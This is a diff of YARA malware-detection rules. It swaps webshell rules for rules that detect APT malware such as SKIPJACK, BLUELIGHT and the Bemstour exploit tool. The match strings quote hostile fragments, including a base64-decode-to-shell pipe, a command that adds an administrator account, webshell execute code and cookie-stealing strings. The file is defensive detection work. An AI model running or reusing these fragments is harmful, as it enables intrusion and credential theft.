-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L388-L403"
+		reference = "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_barracuda_esg_unc4841_jun23.yar#L175-L193"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "aebf6530e89af2ad332062c6aae4a8ca91517c76"
-		logic_hash = "5d2d7e6b9340ee4fd845ff05c99526c919214974b1a0def66492fe3cd4a75fe9"
+		hash = "e4e86c273a2b67a605f5d4686783e0cc"
+		logic_hash = "8890cd9ab8190f12997e0653e43c89816df03c7bd41842e5ad21b1986819843e"
 		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s0 = "<FORM method=post target=_blank>ShellUrl: <INPUT " fullword ascii
-		$s1 = "\" >[Copy code]</a> 4ngr7&nbsp; &nbsp;</td>" fullword ascii
+		$str1 = "hdr:name() == 'Content-ID'" base64
+		$str2 = "hdr:body() ~= nil" base64
+		$str3 = "string.match(hdr:body(),\"^[%w%+/=\\r\\n]+$\")" base64
+		$str4 = "openssl aes-256-cbc" base64
+		$str5 = "mod_content.lua"
+		$str6 = "#!/bin/sh"
 
 	condition:
-		filesize < 13KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Wshell_Asp : FILE
+rule SIGNATURE_BASE_APT_MAL_LUA_Hunting_Lua_SKIPJACK_2
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file wshell-asp.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "294f0d00-7102-553d-92e2-c0a0e017385c"
-		date = "2015-06-23"
+		description = "Hunting rule looking for strings observed in SKIPJACK samples."
+		author = "Mandiant"
+		id = "e1eac294-fe60-5bb2-bae4-0f7bcbe6b1db"
+		date = "2023-06-15"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L405-L421"
+		reference = "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_barracuda_esg_unc4841_jun23.yar#L195-L212"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "4a0afdf5a45a759c14e99eb5315964368ca53e9c"
-		logic_hash = "f3c4af85e4798d3a809d8edd9cc46d1df44453f14ed050b002fe789da4d6096f"
+		hash = "87847445f9524671022d70f2a812728f"
+		logic_hash = "093e8857c410bd30a076f87ef63d7e1e66f50e3dce75b4add67161782386ee24"
 		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s1 = "file1.Write(\"<%response.clear:execute request(\\\"root\\\"):response.End%>\");" fullword ascii
-		$s2 = "hello word !  " fullword ascii
-		$s3 = "root.asp " fullword ascii
+		$str1 = "hdr:name() == 'Content-ID'"
+		$str2 = "hdr:body() ~= nil"
+		$str3 = "string.match(hdr:body(),\"^[%w%+/=\\r\\n]+$\")"
+		$str4 = "openssl aes-256-cbc"
+		$str5 = "| base64 -d| sh 2>"
 
 	condition:
-		filesize < 5KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_ASP_Asp404 : FILE
+rule SIGNATURE_BASE_APT_MAL_LUA_Hunting_Lua_SEASPRAY_1
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file asp404.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "4125bb40-3f5c-53f5-b906-54fa77b119f5"
-		date = "2015-06-23"
+		description = "Hunting rule looking for strings observed in SEASPRAY samples."
+		author = "Mandiant"
+		id = "8c744b85-b61e-56d0-8a9e-ae6a954e1b95"
+		date = "2023-06-15"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L423-L439"
+		reference = "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_barracuda_esg_unc4841_jun23.yar#L213-L228"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "bed51971288aeabba6dabbfb80d2843ec0c4ebf6"
-		logic_hash = "c84be2e561a08317be11cdb0fe103f8ad182a64d8cd1bf987163ebbeabe20f00"
+		hash = "35cf6faf442d325961935f660e2ab5a0"
+		logic_hash = "856bfb47557b60f69aa1141477d6ce446ea13ebbe899022d7996ceef08bdefbb"
 		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s0 = "temp1 = Len(folderspec) - Len(server.MapPath(\"./\")) -1" fullword ascii
-		$s1 = "<form name=\"form1\" method=\"post\" action=\"<%= url%>?action=chklogin\">" fullword ascii
-		$s2 = "<td>&nbsp;<a href=\"<%=tempurl+f1.name%>\" target=\"_blank\"><%=f1.name%></a></t" ascii
+		$str1 = "string.find(attachment:filename(),'obt075') ~= nil"
+		$str2 = "os.execute('cp '..tostring(tmpfile)..' /tmp/'..attachment:filename())"
+		$str3 = "os.execute('rverify'..' /tmp/'..attachment:filename())"
 
 	condition:
-		filesize < 113KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Serv_U_Asp : FILE
+rule SIGNATURE_BASE_Cloudduke_Malware : FILE
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file Serv-U asp.txt"
+		description = "Detects CloudDuke Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "06a58a05-92bd-5124-a172-2bfd9491c2fc"
-		date = "2015-06-23"
+		id = "902ef68b-7ed1-5622-b796-4e3bb2388124"
+		date = "2015-07-22"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L441-L457"
+		reference = "https://www.f-secure.com/weblog/archives/00002822.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cloudduke.yar#L10-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "cee91cd462a459d31a95ac08fe80c70d2f9c1611"
-		logic_hash = "c98c3f4db5ea812827b6108ef88b57116621142202248f4f26f0c71bd76e33ec"
-		score = 70
+		logic_hash = "eaa159a99b6518db736adfd555bfcd052c2ae21b2e60a1db80b90459c47c90ab"
+		score = 60
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "97d8725e39d263ed21856477ed09738755134b5c0d0b9ae86ebb1cdd4cdc18b7"
+		hash2 = "88a40d5b679bccf9641009514b3d18b09e68b609ffaf414574a6eca6536e8b8f"
+		hash3 = "1d4ac97d43fab1d464017abb5d57a6b4601f99eaa93b01443427ef25ae5127f7"
+		hash4 = "ed7abf93963395ce9c9cba83a864acb4ed5b6e57fd9a6153f0248b8ccc4fdb46"
+		hash5 = "ee5eb9d57c3611e91a27bb1fc2d0aaa6bbfa6c69ab16e65e7123c7c49d46f145"
+		hash6 = "a713982d04d2048a575912a5fc37c93091619becd5b21e96f049890435940004"
+		hash7 = "56ac764b81eb216ebed5a5ad38e703805ba3e1ca7d63501ba60a1fb52c7ebb6e"
 
 	strings:
-		$s1 = "newuser = \"-SETUSERSETUP\" & vbCrLf & \"-IP=0.0.0.0\" & vbCrLf & \"-PortNo=\" &" ascii
-		$s2 = "<td><input name=\"c\" type=\"text\" id=\"c\" value=\"cmd /c net user goldsun lov" ascii
-		$s3 = "deldomain = \"-DELETEDOMAIN\" & vbCrLf & \"-IP=0.0.0.0\" & vbCrLf & \" PortNo=\"" ascii
+		$s1 = "ProcDataWrap" fullword ascii
+		$s2 = "imagehlp.dll" fullword ascii
+		$s3 = "dnlibsh" fullword ascii
+		$s4 = "%ws_out%ws" fullword wide
+		$s5 = "Akernel32.dll" fullword wide
+		$op0 = { 0f b6 80 68 0e 41 00 0b c8 c1 e1 08 0f b6 c2 8b }
+		$op1 = { 8b ce e8 f8 01 00 00 85 c0 74 41 83 7d f8 00 0f }
+		$op2 = { e8 2f a2 ff ff 83 20 00 83 c8 ff 5f 5e 5d c3 55 }
 
 	condition:
-		filesize < 30KB and 2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 720KB and 4 of ( $s* ) and 1 of ( $op* )
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Cfm_List : FILE
+rule SIGNATURE_BASE_SFXRAR_Acrotray : FILE
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file list.cfm"
+		description = "Most likely a malicious file acrotray in SFX RAR / CloudDuke APT 5442.1.exe, 5442.2.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "98302eef-d1e8-5524-a57e-d49c0e92c7e0"
-		date = "2015-06-23"
+		id = "1566fb75-d3a8-5e22-b05b-3a2f37374f31"
+		date = "2015-07-22"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L459-L474"
+		reference = "https://www.f-secure.com/weblog/archives/00002822.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cloudduke.yar#L42-L61"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "85d445b13d2aef1df3b264c9b66d73f0ff345cec"
-		logic_hash = "41c7c5ba6187a8871dec83bcd859b9377813d60cea8ef2b4ad390c67de04e010"
+		logic_hash = "3b318ab2854eb7614dd1a42d3971a96d1d485d5cce552336ad3a7f39886ba710"
 		score = 70
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "51e713c7247f978f5836133dd0b8f9fb229e6594763adda59951556e1df5ee57"
+		hash2 = "5d695ff02202808805da942e484caa7c1dc68e6d9c3d77dc383cfa0617e61e48"
+		hash3 = "56531cc133e7a760b238aadc5b7a622cd11c835a3e6b78079d825d417fb02198"
 
 	strings:
-		$s1 = "<TD><a href=\"javascript:ShowFile('#mydirectory.name#')\">#mydirectory.name#</a>" ascii
-		$s2 = "<TD>#mydirectory.size#</TD>" fullword ascii
+		$s1 = "winrarsfxmappingfile.tmp" fullword wide
+		$s2 = "GETPASSWORD1" fullword wide
+		$s3 = "acrotray.exe" fullword ascii
+		$s4 = "CryptUnprotectMemory failed" fullword wide
 
 	condition:
-		filesize < 10KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 2449KB and all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_PHP_Php2 : FILE
+rule SIGNATURE_BASE_APT_MAL_Win_Bluelight_B : INKYSQUID
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file php2.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "377ff89d-a9ba-526c-97a1-388f9ccb48ba"
-		date = "2015-06-23"
+		description = "North Korean origin malware which uses a custom Google App for c2 communications."
+		author = "threatintel@volexity.com"
+		id = "3ec2d44c-4c08-514d-a839-acef3f53f7dc"
+		date = "2021-06-21"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L476-L491"
+		reference = "https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt37_bluelight.yar#L12-L112"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "bf12e1d741075cd1bd324a143ec26c732a241dea"
-		logic_hash = "707e2795d82636fbbc4d9f5324e509a526f77f9ead8f3c4d59dd0e95bc94f11e"
-		score = 70
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		logic_hash = "a6e83ca2ae15f1a7819f065449f84166da401739d091565605d62ebba3d47a50"
+		score = 75
+		quality = 60
+		tags = "INKYSQUID"
+		hash1 = "837eaf7b736583497afb8bbdb527f70577901eff04cc69d807983b233524bfed"
+		license = "See license at https://github.com/volexity/threat-intel/LICENSE.txt"
 
 	strings:
-		$s1 = "$OOO0O0O00=__FILE__;$OOO000000=urldecode('" ascii
-		$s2 = "<?php // Black" fullword ascii
+		$magic = "host_name: %ls, cookie_name: %s, cookie: %s, CT: %llu, ET: %llu, value: %s, path: %ls, secu: %d, http: %d, last: %llu, has: %d"
+		$f1 = "%ls.INTEG.RAW" wide
+		$f2 = "edb.chk" ascii
+		$f3 = "edb.log" ascii
+		$f4 = "edbres00001.jrs" ascii
+		$f5 = "edbres00002.jrs" ascii
+		$f6 = "edbtmp.log" ascii
+		$f7 = "cheV01.dat" ascii
+		$chrome1 = "Failed to get chrome cookie"
+		$chrome2 = "mail.google.com, cookie_name: OSID"
+		$chrome3 = ".google.com, cookie_name: SID,"
+		$chrome4 = ".google.com, cookie_name: __Secure-3PSID,"
+		$chrome5 = "Failed to get Edge cookie"
+		$chrome6 = "google.com, cookie_name: SID,"
+		$chrome7 = "google.com, cookie_name: __Secure-3PSID,"
+		$chrome8 = "Failed to get New Edge cookie"
+		$chrome9 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0"
+		$chrome10 = "Content-Type: application/x-www-form-urlencoded;charset=utf-8"
+		$chrome11 = "Cookie: SID=%s; OSID=%s; __Secure-3PSID=%s"
+		$chrome12 = "https://mail.google.com"
+		$chrome13 = "result.html"
+		$chrome14 = "GM_ACTION_TOKEN"
+		$chrome15 = "GM_ID_KEY="
+		$chrome16 = "/mail/u/0/?ik=%s&at=%s&view=up&act=prefs"
+		$chrome17 = "p_bx_ie=1"
+		$chrome18 = "myaccount.google.com, cookie_name: OSID"
+		$chrome19 = "Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3"
+		$chrome20 = "Content-Type: application/x-www-form-urlencoded;charset=utf-8"
+		$chrome21 = "Cookie: SID=%s; OSID=%s; __Secure-3PSID=%s"
+		$chrome22 = "https://myaccount.google.com"
+		$chrome23 = "result.html"
+		$chrome24 = "myaccount.google.com"
+		$chrome25 = "/_/AccountSettingsUi/data/batchexecute"
+		$chrome26 = "f.req=%5B%5B%5B%22BqLdsd%22%2C%22%5Btrue%5D%22%2Cnull%2C%22generic%22%5D%5D%5D&at="
+		$chrome27 = "response.html"
+		$msg1 = "https_status is %s"
+		$msg2 = "Success to find GM_ACTION_TOKEN and GM_ID_KEY"
+		$msg3 = "Failed to find GM_ACTION_TOKEN and GM_ID_KEY"
+		$msg4 = "Failed HttpSendRequest to mail.google.com"
+		$msg5 = "Success to enable imap"
+		$msg6 = "Failed to enable imap"
+		$msg7 = "Success to find SNlM0e"
+		$msg8 = "Failed to find SNlM0e"
+		$msg9 = "Failed HttpSendRequest to myaccount.google.com"
+		$msg10 = "Success to enable thunder access"
+		$msg11 = "Failed to enable thunder access"
+		$keylogger_component1 = "[TAB]"
+		$keylogger_component2 = "[RETURN]"
+		$keylogger_component3 = "PAUSE"
+		$keylogger_component4 = "[ESC]"
+		$keylogger_component5 = "[PAGE UP]"
+		$keylogger_component6 = "[PAGE DOWN]"
+		$keylogger_component7 = "[END]"
+		$keylogger_component8 = "[HOME]"
+		$keylogger_component9 = "[ARROW LEFT]"
+		$keylogger_component10 = "[ARROW UP]"
+		$keylogger_component11 = "[ARROW RIGHT]"
+		$keylogger_component12 = "[ARROW DOWN]"
+		$keylogger_component13 = "[INS]"
+		$keylogger_component14 = "[DEL]"
+		$keylogger_component15 = "[WIN]"
+		$keylogger_component16 = "[NUM *]"
+		$keylogger_component17 = "[NUM +]"
+		$keylogger_component18 = "[NUM ,]"
+		$keylogger_component19 = "[NUM -]"
+		$keylogger_component20 = "[NUM .]"
+		$keylogger_component21 = "NUM /]"
+		$keylogger_component22 = "[NUMLOCK]"
+		$keylogger_component23 = "[SCROLLLOCK]"
+		$keylogger_component24 = "Time: "
+		$keylogger_component25 = "Window: "
+		$keylogger_component26 = "CAPSLOCK+"
+		$keylogger_component27 = "SHIFT+"
+		$keylogger_component28 = "CTRL+"
+		$keylogger_component29 = "ALT+"
 
 	condition:
-		filesize < 12KB and all of them
+		$magic or ( all of ( $f* ) and 5 of ( $keylogger_component* ) ) or 24 of ( $chrome* ) or 4 of ( $msg* ) or 27 of ( $keylogger_component* )
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Tuoku_Script_Oracle : FILE
+rule SIGNATURE_BASE_APT_MAL_Win_Bluelight : INKYSQUID
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file oracle.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "adc8dea6-8031-580b-b19a-e5520d41528f"
-		date = "2015-06-23"
+		description = "The BLUELIGHT malware family. Leverages Microsoft OneDrive for network communications."
+		author = "threatintel@volexity.com"
+		id = "3ec2d44c-4c08-514d-a839-acef3f53f7dc"
+		date = "2021-04-23"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L493-L509"
+		reference = "https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt37_bluelight.yar#L114-L144"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "fc7043aaac0ee2d860d11f18ddfffbede9d07957"
-		logic_hash = "3ad4207e426ed2f9df0e0bac0e906af437b0774ba2ebb541afbe7e29b395ad63"
-		score = 70
+		logic_hash = "52589348f42aadbe453ad8a40ac36b58fcc9e07cd298486f09b6f793823d8cc7"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "INKYSQUID"
+		hash1 = "7c40019c1d4cef2ffdd1dd8f388aaba537440b1bffee41789c900122d075a86d"
+		hash2 = "94b71ee0861cc7cfbbae53ad2e411a76f296fd5684edf6b25ebe79bf6a2a600a"
+		license = "See license at https://github.com/volexity/threat-intel/LICENSE.txt"
 
 	strings:
-		$s1 = "String url=\"jdbc:oracle:thin:@localhost:1521:orcl\";" fullword ascii
-		$s2 = "String user=\"oracle_admin\";" fullword ascii
-		$s3 = "String sql=\"SELECT 1,2,3,4,5,6,7,8,9,10 from user_info\";" fullword ascii
+		$pdb1 = "\\Development\\BACKDOOR\\ncov\\"
+		$pdb2 = "Release\\bluelight.pdb"
+		$msg0 = "https://ipinfo.io" fullword
+		$msg1 = "country" fullword
+		$msg5 = "\"UserName\":\"" fullword
+		$msg7 = "\"ComName\":\"" fullword
+		$msg8 = "\"OS\":\"" fullword
+		$msg9 = "\"OnlineIP\":\"" fullword
+		$msg10 = "\"LocalIP\":\"" fullword
+		$msg11 = "\"Time\":\"" fullword
+		$msg12 = "\"Compiled\":\"" fullword
+		$msg13 = "\"Process Level\":\"" fullword
+		$msg14 = "\"AntiVirus\":\"" fullword
+		$msg15 = "\"VM\":\"" fullword
 
 	condition:
-		filesize < 7KB and all of them
+		any of ( $pdb* ) or all of ( $msg* )
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_ASPX_Aspx4 : FILE
+rule SIGNATURE_BASE_Apt3_Bemstour_Strings : FILE
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file aspx4.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "4a13c809-48f7-54f7-9ce3-10d6d48104fb"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L511-L527"
+		description = "Detects strings used by the Bemstour exploitation tool"
+		author = "Mark Lechtik"
+		id = "8b76e10a-040f-505e-9dff-cd0a689b121e"
+		date = "2019-06-25"
+		modified = "2023-12-04"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt3_bemstour.yar#L1-L64"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "200a8f15ffb6e3af31d28c55588003b5025497eb"
-		logic_hash = "0aab8e327b4477cb0b8cd5d4b1e4b52c160180656dad57b0498654da1c8d7a29"
-		score = 70
-		quality = 85
+		hash = "0b28433a2b7993da65e95a45c2adf7bc37edbd2a8db717b85666d6c88140698a"
+		logic_hash = "8aa7491b1dc3595f67ae1229d33f79261616b0f27485b7a27705db63a6111c07"
+		score = 75
+		quality = 60
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		company = "Check Point Software Technologies LTD."
 
 	strings:
-		$s4 = "File.Delete(cdir.FullName + \"\\\\test\");" fullword ascii
-		$s5 = "start<asp:TextBox ID=\"Fport_TextBox\" runat=\"server\" Text=\"c:\\\" Width=\"60" ascii
-		$s6 = "<div>Code By <a href =\"http://www.hkmjj.com\">Www.hkmjj.Com</a></div>" fullword ascii
+		$dbg_print_1 = "leaked address is 0x%llx" ascii wide
+		$dbg_print_2 = "========== %s ==========" ascii wide
+		$dbg_print_3 = "detailVersion:%d" ascii wide
+		$dbg_print_4 = "create pipe twice failed" ascii wide
+		$dbg_print_5 = "WSAStartup function failed with error: %d" ascii wide
+		$dbg_print_6 = "can't open input file." ascii wide
+		$dbg_print_7 = "Allocate Buffer Failed." ascii wide
+		$dbg_print_8 = "Connect to target failed." ascii wide
+		$dbg_print_9 = "connect successful." ascii wide
+		$dbg_print_10 = "not supported Platform" ascii wide
+		$dbg_print_11 = "Wait several seconds." ascii wide
+		$dbg_print_12 = "not set where to write ListEntry ." ascii wide
+		$dbg_print_13 = "backdoor not installed." ascii wide
+		$dbg_print_14 = "REConnect to target failed." ascii wide
+		$dbg_print_15 = "Construct TreeConnectAndX Request Failed." ascii wide
+		$dbg_print_16 = "Construct NTCreateAndXRequest  Failed." ascii wide
+		$dbg_print_17 = "Construct Trans2  Failed." ascii wide
+		$dbg_print_18 = "Construct ConsWXR  Failed." ascii wide
+		$dbg_print_19 = "Construct ConsTransSecondary  Failed." ascii wide
+		$dbg_print_20 = "if you don't want to input password , use server2003 version.." ascii wide
+		$cmdline_1 = "Command format  %s TargetIp domainname username password 2" ascii wide
+		$cmdline_2 = "Command format  %s TargetIp domainname username password 1" ascii wide
+		$cmdline_3 = "cmd.exe /c net user test test /add && cmd.exe /c net localgroup administrators test /add" ascii wide
+		$cmdline_4 = "hello.exe  \"C:\\WINDOWS\\DEBUG\\test.exe\"" ascii wide
+		$cmdline_5 = "parameter not right" ascii wide
+		$smb_param_1 = "browser" ascii wide
+		$smb_param_2 = "spoolss" ascii wide
+		$smb_param_3 = "srvsvc" ascii wide
+		$smb_param_4 = "\\PIPE\\LANMAN" ascii wide
+		$smb_param_5 = "Werttys for Workgroups 3.1a" ascii wide
+		$smb_param_6 = "PC NETWORK PROGRAM 1.0" ascii wide
+		$smb_param_7 = "LANMAN1.0" ascii wide
+		$smb_param_8 = "LM1.2X002" ascii wide
+		$smb_param_9 = "LANMAN2.1" ascii wide
+		$smb_param_10 = "NT LM 0.12" ascii wide
+		$smb_param_12 = "WORKGROUP" ascii wide
+		$smb_param_13 = "Windows Server 2003 3790 Service Pack 2" ascii wide
+		$smb_param_14 = "Windows Server 2003 5.2" ascii wide
+		$smb_param_15 = "Windows 2002 Service Pack 2 2600" ascii wide
+		$smb_param_16 = "Windows 2002 5.1" ascii wide
+		$smb_param_17 = "PC NETWORK PROGRAM 1.0" ascii wide
+		$smb_param_18 = "Windows 2002 5.1" ascii wide
+		$smb_param_19 = "Windows for Workgroups 3.1a" ascii wide
+		$unique_str_1 = "WIN-NGJ7GKNROVS"
+		$unique_str_2 = "XD-A31C2E0087B2"
 
 	condition:
-		filesize < 11KB and all of them
+		uint16( 0 ) == 0x5a4d and ( 5 of ( $dbg_print* ) or 2 of ( $cmdline* ) or 1 of ( $unique_str* ) ) and 3 of ( $smb_param* )
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_ASPX_Aspx : FILE
+rule SIGNATURE_BASE_Apt3_Bemstour_Implant_Byte_Patch
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file aspx.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "4a13c809-48f7-54f7-9ce3-10d6d48104fb"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L529-L546"
+		description = "Detects an implant used by Bemstour exploitation tool (APT3)"
+		author = "Mark Lechtik"
+		id = "c30434c3-8949-566c-b6a6-29bffdaf961d"
+		date = "2019-06-25"
+		modified = "2023-12-04"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt3_bemstour.yar#L69-L104"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "8378619b2a7d446477946eabaa1e6744dec651c1"
-		logic_hash = "b59684633fd72bd1804a96850a8b358db98c169415b6e65fe3ecfb4d9fde72d0"
-		score = 70
+		hash = "0b28433a2b7993da65e95a45c2adf7bc37edbd2a8db717b85666d6c88140698a"
+		logic_hash = "08de2c885ccb24cb247efdcc06bbcbea144d652744b2d38aaa2aabfd341e4f91"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
+		company = "Check Point Software Technologies LTD."
 
 	strings:
-		$s0 = "string iVDT=\"-SETUSERSETUP\\r\\n-IP=0.0.0.0\\r\\n-PortNo=52521\\r\\n-User=bin" ascii
-		$s1 = "SQLExec : <asp:DropDownList runat=\"server\" ID=\"FGEy\" AutoPostBack=\"True\" O" ascii
-		$s2 = "td.Text=\"<a href=\\\"javascript:Bin_PostBack('urJG','\"+dt.Rows[j][\"ProcessID" ascii
-		$s3 = "vyX.Text+=\"<a href=\\\"javascript:Bin_PostBack('Bin_Regread','\"+MVVJ(rootkey)+" ascii
+		$chunk_1 = {
+
+C7 45 ?? 55 8B EC 83
+C7 45 ?? EC 74 53 56
+C7 45 ?? 8B 75 08 33
+C7 45 ?? C9 57 C7 45
+C7 45 ?? 8C 4C 6F 61
+
+}
 
 	condition:
-		filesize < 353KB and 2 of them
+		any of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Su7_X_9_X : FILE
+rule SIGNATURE_BASE_Apt3_Bemstour_Implant_Command_Stack_Variable
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file su7.x-9.x.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5d546ce8-6f8f-5b0b-9472-23f283ef9f80"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L548-L563"
+		description = "Detecs an implant used by Bemstour exploitation tool (APT3)"
+		author = "Mark Lechtik"
+		id = "c773da5a-2d3f-5a0a-af2e-28ad382622b3"
+		date = "2019-06-25"
+		modified = "2023-12-04"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt3_bemstour.yar#L107-L275"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "808396b51023cc8356f8049cfe279b349ca08f1a"
-		logic_hash = "2d2398cf0f9e253eea343d39b6555f2633f92f627f1c93cc28123d5a7f3d1bf1"
-		score = 70
+		hash = "0b28433a2b7993da65e95a45c2adf7bc37edbd2a8db717b85666d6c88140698a"
